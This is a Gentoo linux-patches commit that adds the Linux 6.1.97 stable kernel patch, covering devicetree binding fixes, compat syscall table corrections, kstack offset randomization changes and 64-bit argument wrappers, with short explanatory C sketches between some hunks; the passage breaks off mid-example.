CommitDate: Fri Jul  5 11:07:06 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=26b4a045

Linux patch 6.1.97

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1096_linux-6.1.97.patch | 5214 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5218 insertions(+)

diff --git a/0000_README b/0000_README
index 465332b9..13913ad0 100644
--- a/0000_README
+++ b/0000_README
@@ -427,6 +427,10 @@ Patch:  1095_linux-6.1.96.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.96
 
+Patch:  1096_linux-6.1.97.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.97
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1096_linux-6.1.97.patch b/1096_linux-6.1.97.patch
new file mode 100644
index 00000000..e0146731
--- /dev/null
+++ b/1096_linux-6.1.97.patch
@@ -0,0 +1,5214 @@
+diff --git a/Documentation/devicetree/bindings/i2c/amlogic,meson6-i2c.yaml b/Documentation/devicetree/bindings/i2c/amlogic,meson6-i2c.yaml
+index 199a354ccb970..26bed558c6b87 100644
+--- a/Documentation/devicetree/bindings/i2c/amlogic,meson6-i2c.yaml
++++ b/Documentation/devicetree/bindings/i2c/amlogic,meson6-i2c.yaml
+@@ -2,8 +2,8 @@
+ # Copyright 2019 BayLibre, SAS
+ %YAML 1.2
+ ---
+-$id: "http://devicetree.org/schemas/i2c/amlogic,meson6-i2c.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++$id: http://devicetree.org/schemas/i2c/amlogic,meson6-i2c.yaml#
++$schema: http://devicetree.org/meta-schemas/core.yaml#
+ 
+ title: Amlogic Meson I2C Controller
+ 
+diff --git a/Documentation/devicetree/bindings/i2c/apple,i2c.yaml b/Documentation/devicetree/bindings/i2c/apple,i2c.yaml
+index 4ac61fec90e26..243da7003cec5 100644
+--- a/Documentation/devicetree/bindings/i2c/apple,i2c.yaml
++++ b/Documentation/devicetree/bindings/i2c/apple,i2c.yaml
+@@ -1,8 +1,8 @@
+ # SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
+ %YAML 1.2
+ ---
+-$id: "http://devicetree.org/schemas/i2c/apple,i2c.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++$id: http://devicetree.org/schemas/i2c/apple,i2c.yaml#
++$schema: http://devicetree.org/meta-schemas/core.yaml#
+ 
+ title: Apple/PASemi I2C controller
+ 
+diff --git a/Documentation/devicetree/bindings/i2c/atmel,at91sam-i2c.yaml b/Documentation/devicetree/bindings/i2c/atmel,at91sam-i2c.yaml
+index ea2303c0e1431..c22e459c175ab 100644
+--- a/Documentation/devicetree/bindings/i2c/atmel,at91sam-i2c.yaml
++++ b/Documentation/devicetree/bindings/i2c/atmel,at91sam-i2c.yaml
+@@ -75,7 +75,7 @@ required:
+   - clocks
+ 
+ allOf:
+-  - $ref: "i2c-controller.yaml"
++  - $ref: /schemas/i2c/i2c-controller.yaml#
+   - if:
+       properties:
+         compatible:
+diff --git a/Documentation/devicetree/bindings/i2c/cdns,i2c-r1p10.yaml b/Documentation/devicetree/bindings/i2c/cdns,i2c-r1p10.yaml
+index 2e95cda7262ad..7a675aa08c442 100644
+--- a/Documentation/devicetree/bindings/i2c/cdns,i2c-r1p10.yaml
++++ b/Documentation/devicetree/bindings/i2c/cdns,i2c-r1p10.yaml
+@@ -1,8 +1,8 @@
+ # SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
+ %YAML 1.2
+ ---
+-$id: "http://devicetree.org/schemas/i2c/cdns,i2c-r1p10.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++$id: http://devicetree.org/schemas/i2c/cdns,i2c-r1p10.yaml#
++$schema: http://devicetree.org/meta-schemas/core.yaml#
+ 
+ title: Cadence I2C controller
+ 
+diff --git a/Documentation/devicetree/bindings/i2c/i2c-mux-gpio.yaml b/Documentation/devicetree/bindings/i2c/i2c-mux-gpio.yaml
+index 6e0a5686af048..f34cc7ad5a00e 100644
+--- a/Documentation/devicetree/bindings/i2c/i2c-mux-gpio.yaml
++++ b/Documentation/devicetree/bindings/i2c/i2c-mux-gpio.yaml
+@@ -45,7 +45,7 @@ properties:
+ 
+   i2c-parent:
+     description: phandle of the I2C bus that this multiplexer's master-side port is connected to
+-    $ref: "/schemas/types.yaml#/definitions/phandle"
++    $ref: /schemas/types.yaml#/definitions/phandle
+ 
+   mux-gpios:
+     description: list of GPIOs used to control the muxer
+@@ -55,7 +55,7 @@ properties:
+   idle-state:
+     description: Value to set the muxer to when idle. When no value is given, it defaults to the
+       last value used.
+-    $ref: "/schemas/types.yaml#/definitions/uint32"
++    $ref: /schemas/types.yaml#/definitions/uint32
+ 
+ allOf:
+   - $ref: i2c-mux.yaml
+diff --git a/Documentation/devicetree/bindings/i2c/qcom,i2c-geni-qcom.yaml b/Documentation/devicetree/bindings/i2c/qcom,i2c-geni-qcom.yaml
+index 0e7ed00562e21..5a44fdcbdd59b 100644
+--- a/Documentation/devicetree/bindings/i2c/qcom,i2c-geni-qcom.yaml
++++ b/Documentation/devicetree/bindings/i2c/qcom,i2c-geni-qcom.yaml
+@@ -1,8 +1,8 @@
+ # SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
+ %YAML 1.2
+ ---
+-$id: "http://devicetree.org/schemas/i2c/qcom,i2c-geni-qcom.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++$id: http://devicetree.org/schemas/i2c/qcom,i2c-geni-qcom.yaml#
++$schema: http://devicetree.org/meta-schemas/core.yaml#
+ 
+ title: Qualcomm Geni based QUP I2C Controller
+ 
+diff --git a/Documentation/devicetree/bindings/i2c/st,stm32-i2c.yaml b/Documentation/devicetree/bindings/i2c/st,stm32-i2c.yaml
+index bf396e9466aaf..94b75d9f66cdb 100644
+--- a/Documentation/devicetree/bindings/i2c/st,stm32-i2c.yaml
++++ b/Documentation/devicetree/bindings/i2c/st,stm32-i2c.yaml
+@@ -90,7 +90,7 @@ properties:
+   st,syscfg-fmp:
+     description: Use to set Fast Mode Plus bit within SYSCFG when Fast Mode
+       Plus speed is selected by slave.
+-    $ref: "/schemas/types.yaml#/definitions/phandle-array"
++    $ref: /schemas/types.yaml#/definitions/phandle-array
+     items:
+       - items:
+           - description: phandle to syscfg
+diff --git a/Documentation/devicetree/bindings/i2c/xlnx,xps-iic-2.00.a.yaml b/Documentation/devicetree/bindings/i2c/xlnx,xps-iic-2.00.a.yaml
+index 8d241a703d855..f3b53ecae5625 100644
+--- a/Documentation/devicetree/bindings/i2c/xlnx,xps-iic-2.00.a.yaml
++++ b/Documentation/devicetree/bindings/i2c/xlnx,xps-iic-2.00.a.yaml
+@@ -1,8 +1,8 @@
+ # SPDX-License-Identifier: (GPL-2.0 OR BSD-2-Clause)
+ %YAML 1.2
+ ---
+-$id: "http://devicetree.org/schemas/i2c/xlnx,xps-iic-2.00.a.yaml#"
+-$schema: "http://devicetree.org/meta-schemas/core.yaml#"
++$id: http://devicetree.org/schemas/i2c/xlnx,xps-iic-2.00.a.yaml#
++$schema: http://devicetree.org/meta-schemas/core.yaml#
+ 
+ title: Xilinx IIC controller
+ 
+diff --git a/Makefile b/Makefile
+index 83658d447564f..c2148be2ba340 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 96
++SUBLEVEL = 97
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/rk3066a.dtsi b/arch/arm/boot/dts/rk3066a.dtsi
+index de9915d946f74..b98d5e357baf3 100644
+--- a/arch/arm/boot/dts/rk3066a.dtsi
++++ b/arch/arm/boot/dts/rk3066a.dtsi
+@@ -123,6 +123,7 @@ hdmi: hdmi@10116000 {
+ 		pinctrl-0 = <&hdmii2c_xfer>, <&hdmi_hpd>;
+ 		power-domains = <&power RK3066_PD_VIO>;
+ 		rockchip,grf = <&grf>;
++		#sound-dai-cells = <0>;
+ 		status = "disabled";
+ 
+ 		ports {
+diff --git a/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts b/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
+index a71f249ed384e..edc8d2e3980d0 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
+@@ -5,6 +5,8 @@
+  */
+ 
+ /dts-v1/;
++
++#include <dt-bindings/leds/common.h>
+ #include "rk3308.dtsi"
+ 
+ / {
+@@ -24,17 +26,21 @@ chosen {
+ 	leds {
+ 		compatible = "gpio-leds";
+ 		pinctrl-names = "default";
+-		pinctrl-0 = <&green_led_gio>, <&heartbeat_led_gpio>;
++		pinctrl-0 = <&green_led>, <&heartbeat_led>;
+ 
+ 		green-led {
++			color = <LED_COLOR_ID_GREEN>;
+ 			default-state = "on";
++			function = LED_FUNCTION_POWER;
+ 			gpios = <&gpio0 RK_PA6 GPIO_ACTIVE_HIGH>;
+ 			label = "rockpis:green:power";
+ 			linux,default-trigger = "default-on";
+ 		};
+ 
+ 		blue-led {
++			color = <LED_COLOR_ID_BLUE>;
+ 			default-state = "on";
++			function = LED_FUNCTION_HEARTBEAT;
+ 			gpios = <&gpio0 RK_PA5 GPIO_ACTIVE_HIGH>;
+ 			label = "rockpis:blue:user";
+ 			linux,default-trigger = "heartbeat";
+@@ -127,10 +133,12 @@ &cpu0 {
+ };
+ 
+ &emmc {
+-	bus-width = <4>;
+ 	cap-mmc-highspeed;
+-	mmc-hs200-1_8v;
++	cap-sd-highspeed;
++	no-sdio;
+ 	non-removable;
++	pinctrl-names = "default";
++	pinctrl-0 = <&emmc_bus8 &emmc_clk &emmc_cmd>;
+ 	vmmc-supply = <&vcc_io>;
+ 	status = "okay";
+ };
+@@ -153,11 +161,11 @@ &pinctrl {
+ 	pinctrl-0 = <&rtc_32k>;
+ 
+ 	leds {
+-		green_led_gio: green-led-gpio {
++		green_led: green-led {
+ 			rockchip,pins = <0 RK_PA6 RK_FUNC_GPIO &pcfg_pull_none>;
+ 		};
+ 
+-		heartbeat_led_gpio: heartbeat-led-gpio {
++		heartbeat_led: heartbeat-led {
+ 			rockchip,pins = <0 RK_PA5 RK_FUNC_GPIO &pcfg_pull_none>;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts b/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
+index 018a3a5075c72..d9905a08c6ce8 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3328-rock-pi-e.dts
+@@ -186,8 +186,8 @@ &i2c1 {
+ 	rk805: pmic@18 {
+ 		compatible = "rockchip,rk805";
+ 		reg = <0x18>;
+-		interrupt-parent = <&gpio2>;
+-		interrupts = <6 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-parent = <&gpio0>;
++		interrupts = <2 IRQ_TYPE_LEVEL_LOW>;
+ 		#clock-cells = <1>;
+ 		clock-output-names = "xin32k", "rk805-clkout2";
+ 		gpio-controller;
+diff --git a/arch/arm64/boot/dts/rockchip/rk3368.dtsi b/arch/arm64/boot/dts/rockchip/rk3368.dtsi
+index a4c5aaf1f4579..cac58ad951b2e 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3368.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3368.dtsi
+@@ -790,6 +790,7 @@ spdif: spdif@ff880000 {
+ 		dma-names = "tx";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&spdif_tx>;
++		#sound-dai-cells = <0>;
+ 		status = "disabled";
+ 	};
+ 
+@@ -801,6 +802,7 @@ i2s_2ch: i2s-2ch@ff890000 {
+ 		clocks = <&cru SCLK_I2S_2CH>, <&cru HCLK_I2S_2CH>;
+ 		dmas = <&dmac_bus 6>, <&dmac_bus 7>;
+ 		dma-names = "tx", "rx";
++		#sound-dai-cells = <0>;
+ 		status = "disabled";
+ 	};
+ 
+@@ -814,6 +816,7 @@ i2s_8ch: i2s-8ch@ff898000 {
+ 		dma-names = "tx", "rx";
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&i2s_8ch_bus>;
++		#sound-dai-cells = <0>;
+ 		status = "disabled";
+ 	};
+ 
+diff --git a/arch/arm64/include/asm/unistd32.h b/arch/arm64/include/asm/unistd32.h
+index 604a2053d0067..f464a2e0b4880 100644
+--- a/arch/arm64/include/asm/unistd32.h
++++ b/arch/arm64/include/asm/unistd32.h
+@@ -840,7 +840,7 @@ __SYSCALL(__NR_pselect6_time64, compat_sys_pselect6_time64)
+ #define __NR_ppoll_time64 414
+ __SYSCALL(__NR_ppoll_time64, compat_sys_ppoll_time64)
+ #define __NR_io_pgetevents_time64 416
+-__SYSCALL(__NR_io_pgetevents_time64, sys_io_pgetevents)
++__SYSCALL(__NR_io_pgetevents_time64, compat_sys_io_pgetevents_time64)
+ #define __NR_recvmmsg_time64 417
+ __SYSCALL(__NR_recvmmsg_time64, compat_sys_recvmmsg_time64)
+ #define __NR_mq_timedsend_time64 418
+diff --git a/arch/arm64/kernel/syscall.c b/arch/arm64/kernel/syscall.c
+index d72e8f23422da..c771e94568b9b 100644
+--- a/arch/arm64/kernel/syscall.c
++++ b/arch/arm64/kernel/syscall.c
+@@ -57,17 +57,15 @@ static void invoke_syscall(struct pt_regs *regs, unsigned int scno,
+ 	syscall_set_return_value(current, regs, 0, ret);
+ 
+ 	/*
+-	 * Ultimately, this value will get limited by KSTACK_OFFSET_MAX(),
+-	 * but not enough for arm64 stack utilization comfort. To keep
+-	 * reasonable stack head room, reduce the maximum offset to 9 bits.
++	 * This value will get limited by KSTACK_OFFSET_MAX(), which is 10
++	 * bits. The actual entropy will be further reduced by the compiler
++	 * when applying stack alignment constraints: the AAPCS mandates a
++	 * 16-byte aligned SP at function boundaries, which will remove the
++	 * 4 low bits from any entropy chosen here.
+ 	 *
+-	 * The actual entropy will be further reduced by the compiler when
+-	 * applying stack alignment constraints: the AAPCS mandates a
+-	 * 16-byte (i.e. 4-bit) aligned SP at function boundaries.
+-	 *
+-	 * The resulting 5 bits of entropy is seen in SP[8:4].
++	 * The resulting 6 bits of entropy is seen in SP[9:4].
+ 	 */
+-	choose_random_kstack_offset(get_random_u16() & 0x1FF);
++	choose_random_kstack_offset(get_random_u16());
+ }
+ 
+ static inline bool has_syscall_work(unsigned long flags)
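For context: the hunk above stops pre-masking the random value and leans on the
generic cap instead. A minimal standalone sketch of the arithmetic the new
comment describes (the 0x3FF mask is assumed from the "10 bits" it mentions;
this is illustration, not kernel code):

	#include <stdio.h>

	/* assumed 10-bit cap, per the comment in the hunk above */
	#define KSTACK_OFFSET_MAX(x) ((x) & 0x3FF)

	int main(void)
	{
		unsigned int raw = 0xBEEF;		/* e.g. a get_random_u16() value */
		unsigned int capped = KSTACK_OFFSET_MAX(raw);
		unsigned int applied = capped & ~0xFU;	/* 16-byte SP alignment drops 4 bits */

		printf("raw=%#x capped=%#x applied=%#x -> entropy in SP[9:4]\n",
		       raw, capped, applied);
		return 0;
	}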
+diff --git a/arch/csky/include/uapi/asm/unistd.h b/arch/csky/include/uapi/asm/unistd.h
+index 7ff6a2466af10..e0594b6370a65 100644
+--- a/arch/csky/include/uapi/asm/unistd.h
++++ b/arch/csky/include/uapi/asm/unistd.h
+@@ -6,6 +6,7 @@
+ #define __ARCH_WANT_SYS_CLONE3
+ #define __ARCH_WANT_SET_GET_RLIMIT
+ #define __ARCH_WANT_TIME32_SYSCALLS
++#define __ARCH_WANT_SYNC_FILE_RANGE2
+ #include <asm-generic/unistd.h>
+ 
+ #define __NR_set_thread_area	(__NR_arch_specific_syscall + 0)
+diff --git a/arch/hexagon/include/asm/syscalls.h b/arch/hexagon/include/asm/syscalls.h
+new file mode 100644
+index 0000000000000..40f2d08bec92c
+--- /dev/null
++++ b/arch/hexagon/include/asm/syscalls.h
+@@ -0,0 +1,6 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++
++#include <asm-generic/syscalls.h>
++
++asmlinkage long sys_hexagon_fadvise64_64(int fd, int advice,
++	                                  u32 a2, u32 a3, u32 a4, u32 a5);
+diff --git a/arch/hexagon/include/uapi/asm/unistd.h b/arch/hexagon/include/uapi/asm/unistd.h
+index 432c4db1b6239..21ae22306b5dc 100644
+--- a/arch/hexagon/include/uapi/asm/unistd.h
++++ b/arch/hexagon/include/uapi/asm/unistd.h
+@@ -36,5 +36,6 @@
+ #define __ARCH_WANT_SYS_VFORK
+ #define __ARCH_WANT_SYS_FORK
+ #define __ARCH_WANT_TIME32_SYSCALLS
++#define __ARCH_WANT_SYNC_FILE_RANGE2
+ 
+ #include <asm-generic/unistd.h>
+diff --git a/arch/hexagon/kernel/syscalltab.c b/arch/hexagon/kernel/syscalltab.c
+index 0fadd582cfc77..5d98bdc494ec2 100644
+--- a/arch/hexagon/kernel/syscalltab.c
++++ b/arch/hexagon/kernel/syscalltab.c
+@@ -14,6 +14,13 @@
+ #undef __SYSCALL
+ #define __SYSCALL(nr, call) [nr] = (call),
+ 
++SYSCALL_DEFINE6(hexagon_fadvise64_64, int, fd, int, advice,
++		SC_ARG64(offset), SC_ARG64(len))
++{
++	return ksys_fadvise64_64(fd, SC_VAL64(loff_t, offset), SC_VAL64(loff_t, len), advice);
++}
++#define sys_fadvise64_64 sys_hexagon_fadvise64_64
++
+ void *sys_call_table[__NR_syscalls] = {
+ #include <asm/unistd.h>
+ };
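The wrapper above exists because a 64-bit offset/len pair reaches a 32-bit
kernel as two 32-bit register halves; SC_ARG64()/SC_VAL64() hide the split and
the (endian-dependent) half ordering. A rough standalone sketch of the idea --
the exact macro expansion is not quoted here, and the lo/hi order shown is an
assumption:

	#include <stdint.h>
	#include <stdio.h>

	/* recombine two register halves into the original 64-bit value */
	static int64_t recombine(uint32_t lo, uint32_t hi)
	{
		return (int64_t)(((uint64_t)hi << 32) | lo);
	}

	int main(void)
	{
		int64_t offset = 0x123456789aLL;
		uint32_t lo = (uint32_t)offset;
		uint32_t hi = (uint32_t)((uint64_t)offset >> 32);

		printf("roundtrip ok: %d\n", recombine(lo, hi) == offset);
		return 0;
	}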
+diff --git a/arch/mips/kernel/syscalls/syscall_n32.tbl b/arch/mips/kernel/syscalls/syscall_n32.tbl
+index 253ff994ed2ec..5d952a57c0eed 100644
+--- a/arch/mips/kernel/syscalls/syscall_n32.tbl
++++ b/arch/mips/kernel/syscalls/syscall_n32.tbl
+@@ -354,7 +354,7 @@
+ 412	n32	utimensat_time64		sys_utimensat
+ 413	n32	pselect6_time64			compat_sys_pselect6_time64
+ 414	n32	ppoll_time64			compat_sys_ppoll_time64
+-416	n32	io_pgetevents_time64		sys_io_pgetevents
++416	n32	io_pgetevents_time64		compat_sys_io_pgetevents_time64
+ 417	n32	recvmmsg_time64			compat_sys_recvmmsg_time64
+ 418	n32	mq_timedsend_time64		sys_mq_timedsend
+ 419	n32	mq_timedreceive_time64		sys_mq_timedreceive
+diff --git a/arch/mips/kernel/syscalls/syscall_o32.tbl b/arch/mips/kernel/syscalls/syscall_o32.tbl
+index 8f243e35a7b20..7ab572040f534 100644
+--- a/arch/mips/kernel/syscalls/syscall_o32.tbl
++++ b/arch/mips/kernel/syscalls/syscall_o32.tbl
+@@ -403,7 +403,7 @@
+ 412	o32	utimensat_time64		sys_utimensat			sys_utimensat
+ 413	o32	pselect6_time64			sys_pselect6			compat_sys_pselect6_time64
+ 414	o32	ppoll_time64			sys_ppoll			compat_sys_ppoll_time64
+-416	o32	io_pgetevents_time64		sys_io_pgetevents		sys_io_pgetevents
++416	o32	io_pgetevents_time64		sys_io_pgetevents		compat_sys_io_pgetevents_time64
+ 417	o32	recvmmsg_time64			sys_recvmmsg			compat_sys_recvmmsg_time64
+ 418	o32	mq_timedsend_time64		sys_mq_timedsend		sys_mq_timedsend
+ 419	o32	mq_timedreceive_time64		sys_mq_timedreceive		sys_mq_timedreceive
+diff --git a/arch/parisc/Kconfig b/arch/parisc/Kconfig
+index abf39ecda6fb1..5762633ea95e4 100644
+--- a/arch/parisc/Kconfig
++++ b/arch/parisc/Kconfig
+@@ -14,6 +14,7 @@ config PARISC
+ 	select ARCH_HAS_UBSAN_SANITIZE_ALL
+ 	select ARCH_HAS_PTE_SPECIAL
+ 	select ARCH_NO_SG_CHAIN
++	select ARCH_SPLIT_ARG64 if !64BIT
+ 	select ARCH_SUPPORTS_HUGETLBFS if PA20
+ 	select ARCH_SUPPORTS_MEMORY_FAILURE
+ 	select ARCH_STACKWALK
+diff --git a/arch/parisc/kernel/sys_parisc32.c b/arch/parisc/kernel/sys_parisc32.c
+index 2a12a547b447b..826c8e51b5853 100644
+--- a/arch/parisc/kernel/sys_parisc32.c
++++ b/arch/parisc/kernel/sys_parisc32.c
+@@ -23,12 +23,3 @@ asmlinkage long sys32_unimplemented(int r26, int r25, int r24, int r23,
+     	current->comm, current->pid, r20);
+     return -ENOSYS;
+ }
+-
+-asmlinkage long sys32_fanotify_mark(compat_int_t fanotify_fd, compat_uint_t flags,
+-	compat_uint_t mask0, compat_uint_t mask1, compat_int_t dfd,
+-	const char  __user * pathname)
+-{
+-	return sys_fanotify_mark(fanotify_fd, flags,
+-			((__u64)mask1 << 32) | mask0,
+-			 dfd, pathname);
+-}
+diff --git a/arch/parisc/kernel/syscalls/syscall.tbl b/arch/parisc/kernel/syscalls/syscall.tbl
+index 0e42fceb2d5e2..42702f5d49f28 100644
+--- a/arch/parisc/kernel/syscalls/syscall.tbl
++++ b/arch/parisc/kernel/syscalls/syscall.tbl
+@@ -108,7 +108,7 @@
+ 95	common	fchown			sys_fchown
+ 96	common	getpriority		sys_getpriority
+ 97	common	setpriority		sys_setpriority
+-98	common	recv			sys_recv
++98	common	recv			sys_recv			compat_sys_recv
+ 99	common	statfs			sys_statfs			compat_sys_statfs
+ 100	common	fstatfs			sys_fstatfs			compat_sys_fstatfs
+ 101	common	stat64			sys_stat64
+@@ -135,7 +135,7 @@
+ 120	common	clone			sys_clone_wrapper
+ 121	common	setdomainname		sys_setdomainname
+ 122	common	sendfile		sys_sendfile			compat_sys_sendfile
+-123	common	recvfrom		sys_recvfrom
++123	common	recvfrom		sys_recvfrom			compat_sys_recvfrom
+ 124	32	adjtimex		sys_adjtimex_time32
+ 124	64	adjtimex		sys_adjtimex
+ 125	common	mprotect		sys_mprotect
+@@ -364,7 +364,7 @@
+ 320	common	accept4			sys_accept4
+ 321	common	prlimit64		sys_prlimit64
+ 322	common	fanotify_init		sys_fanotify_init
+-323	common	fanotify_mark		sys_fanotify_mark		sys32_fanotify_mark
++323	common	fanotify_mark		sys_fanotify_mark		compat_sys_fanotify_mark
+ 324	32	clock_adjtime		sys_clock_adjtime32
+ 324	64	clock_adjtime		sys_clock_adjtime
+ 325	common	name_to_handle_at	sys_name_to_handle_at
+diff --git a/arch/powerpc/kernel/syscalls/syscall.tbl b/arch/powerpc/kernel/syscalls/syscall.tbl
+index a0be127475b1f..1195f88199caa 100644
+--- a/arch/powerpc/kernel/syscalls/syscall.tbl
++++ b/arch/powerpc/kernel/syscalls/syscall.tbl
+@@ -230,8 +230,10 @@
+ 178	nospu 	rt_sigsuspend			sys_rt_sigsuspend		compat_sys_rt_sigsuspend
+ 179	32	pread64				sys_ppc_pread64			compat_sys_ppc_pread64
+ 179	64	pread64				sys_pread64
++179	spu	pread64				sys_pread64
+ 180	32	pwrite64			sys_ppc_pwrite64		compat_sys_ppc_pwrite64
+ 180	64	pwrite64			sys_pwrite64
++180	spu	pwrite64			sys_pwrite64
+ 181	common	chown				sys_chown
+ 182	common	getcwd				sys_getcwd
+ 183	common	capget				sys_capget
+@@ -246,6 +248,7 @@
+ 190	common	ugetrlimit			sys_getrlimit			compat_sys_getrlimit
+ 191	32	readahead			sys_ppc_readahead		compat_sys_ppc_readahead
+ 191	64	readahead			sys_readahead
++191	spu	readahead			sys_readahead
+ 192	32	mmap2				sys_mmap2			compat_sys_mmap2
+ 193	32	truncate64			sys_ppc_truncate64		compat_sys_ppc_truncate64
+ 194	32	ftruncate64			sys_ppc_ftruncate64		compat_sys_ppc_ftruncate64
+@@ -293,6 +296,7 @@
+ 232	nospu	set_tid_address			sys_set_tid_address
+ 233	32	fadvise64			sys_ppc32_fadvise64		compat_sys_ppc32_fadvise64
+ 233	64	fadvise64			sys_fadvise64
++233	spu	fadvise64			sys_fadvise64
+ 234	nospu	exit_group			sys_exit_group
+ 235	nospu	lookup_dcookie			sys_lookup_dcookie		compat_sys_lookup_dcookie
+ 236	common	epoll_create			sys_epoll_create
+@@ -502,7 +506,7 @@
+ 412	32	utimensat_time64		sys_utimensat			sys_utimensat
+ 413	32	pselect6_time64			sys_pselect6			compat_sys_pselect6_time64
+ 414	32	ppoll_time64			sys_ppoll			compat_sys_ppoll_time64
+-416	32	io_pgetevents_time64		sys_io_pgetevents		sys_io_pgetevents
++416	32	io_pgetevents_time64		sys_io_pgetevents		compat_sys_io_pgetevents_time64
+ 417	32	recvmmsg_time64			sys_recvmmsg			compat_sys_recvmmsg_time64
+ 418	32	mq_timedsend_time64		sys_mq_timedsend		sys_mq_timedsend
+ 419	32	mq_timedreceive_time64		sys_mq_timedreceive		sys_mq_timedreceive
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index 528ec7cc9a622..0d3f00eb0baee 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -156,7 +156,7 @@ unsigned long __get_wchan(struct task_struct *task)
+ 	return pc;
+ }
+ 
+-noinline void arch_stack_walk(stack_trace_consume_fn consume_entry, void *cookie,
++noinline noinstr void arch_stack_walk(stack_trace_consume_fn consume_entry, void *cookie,
+ 		     struct task_struct *task, struct pt_regs *regs)
+ {
+ 	walk_stackframe(task, regs, consume_entry, cookie);
+diff --git a/arch/s390/include/asm/entry-common.h b/arch/s390/include/asm/entry-common.h
+index 000de2b1e67a2..74124092b1c7e 100644
+--- a/arch/s390/include/asm/entry-common.h
++++ b/arch/s390/include/asm/entry-common.h
+@@ -55,7 +55,7 @@ static __always_inline void arch_exit_to_user_mode(void)
+ static inline void arch_exit_to_user_mode_prepare(struct pt_regs *regs,
+ 						  unsigned long ti_work)
+ {
+-	choose_random_kstack_offset(get_tod_clock_fast() & 0xff);
++	choose_random_kstack_offset(get_tod_clock_fast());
+ }
+ 
+ #define arch_exit_to_user_mode_prepare arch_exit_to_user_mode_prepare
+diff --git a/arch/s390/kernel/syscalls/syscall.tbl b/arch/s390/kernel/syscalls/syscall.tbl
+index 799147658dee2..42acea15441dd 100644
+--- a/arch/s390/kernel/syscalls/syscall.tbl
++++ b/arch/s390/kernel/syscalls/syscall.tbl
+@@ -418,7 +418,7 @@
+ 412	32	utimensat_time64	-				sys_utimensat
+ 413	32	pselect6_time64		-				compat_sys_pselect6_time64
+ 414	32	ppoll_time64		-				compat_sys_ppoll_time64
+-416	32	io_pgetevents_time64	-				sys_io_pgetevents
++416	32	io_pgetevents_time64	-				compat_sys_io_pgetevents_time64
+ 417	32	recvmmsg_time64		-				compat_sys_recvmmsg_time64
+ 418	32	mq_timedsend_time64	-				sys_mq_timedsend
+ 419	32	mq_timedreceive_time64	-				sys_mq_timedreceive
+diff --git a/arch/s390/pci/pci_irq.c b/arch/s390/pci/pci_irq.c
+index a2b42a63a53ba..04c19ab93a329 100644
+--- a/arch/s390/pci/pci_irq.c
++++ b/arch/s390/pci/pci_irq.c
+@@ -410,7 +410,7 @@ static void __init cpu_enable_directed_irq(void *unused)
+ 	union zpci_sic_iib iib = {{0}};
+ 	union zpci_sic_iib ziib = {{0}};
+ 
+-	iib.cdiib.dibv_addr = (u64) zpci_ibv[smp_processor_id()]->vector;
++	iib.cdiib.dibv_addr = virt_to_phys(zpci_ibv[smp_processor_id()]->vector);
+ 
+ 	zpci_set_irq_ctrl(SIC_IRQ_MODE_SET_CPU, 0, &iib);
+ 	zpci_set_irq_ctrl(SIC_IRQ_MODE_D_SINGLE, PCI_ISC, &ziib);
+diff --git a/arch/sh/kernel/sys_sh32.c b/arch/sh/kernel/sys_sh32.c
+index 9dca568509a5e..d6f4afcb0e870 100644
+--- a/arch/sh/kernel/sys_sh32.c
++++ b/arch/sh/kernel/sys_sh32.c
+@@ -59,3 +59,14 @@ asmlinkage int sys_fadvise64_64_wrapper(int fd, u32 offset0, u32 offset1,
+ 				 (u64)len0 << 32 | len1, advice);
+ #endif
+ }
++
++/*
++ * swap the arguments the way that libc wants them instead of
++ * moving flags ahead of the 64-bit nbytes argument
++ */
++SYSCALL_DEFINE6(sh_sync_file_range6, int, fd, SC_ARG64(offset),
++                SC_ARG64(nbytes), unsigned int, flags)
++{
++        return ksys_sync_file_range(fd, SC_VAL64(loff_t, offset),
++                                    SC_VAL64(loff_t, nbytes), flags);
++}
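The reordering matters on 32-bit ABIs that pass 64-bit arguments in aligned
register pairs: sync_file_range(fd, off64, n64, flags) wastes a register slot
on padding, which is why sync_file_range2() moves flags ahead of the 64-bit
values (per the sync_file_range(2) man page). Userspace is unaffected either
way, since libc keeps the historical order, as in this generic sketch (the
file name is made up):

	#define _GNU_SOURCE
	#include <fcntl.h>
	#include <stdio.h>

	int main(void)
	{
		int fd = open("data.bin", O_WRONLY);

		if (fd < 0)
			return 1;
		/* libc argument order: fd, offset, nbytes, flags */
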